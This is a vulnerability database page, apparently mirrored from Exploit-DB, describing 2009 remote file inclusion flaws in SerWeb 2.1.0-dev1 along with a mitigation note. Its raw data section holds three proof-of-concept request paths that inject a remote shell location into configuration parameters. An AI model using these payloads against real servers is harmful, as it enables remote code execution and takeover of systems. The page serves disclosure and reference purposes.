header-logo
Suggest Exploit
vendor:
SerWeb
by:
milw0rm.com
9
CVSS
HIGH
Multiple Remote File Inclusion Vulnerabilities
98
CWE
Product Name: SerWeb
Affected Version From: 2.1.0-dev1
Affected Version To: 2.1.0-dev1
Patch Exists: YES
Related CWE: N/A
CPE: serweb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities

SerWeb versions 2.1.0-dev1 and prior are vulnerable to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request containing malicious PHP code. This code will be executed on the vulnerable server.

Mitigation:

Upgrade to the latest version of SerWeb or apply the appropriate patch.
Source

Exploit-DB raw data:

SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/
POC:
/load_lang.php?_SERWEB[configdir]=Shell
/main_prepend.php?_SERWEB[functionsdir]=Shell
/load_phplib.php?_PHPLIB[libdir]=Shell
Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR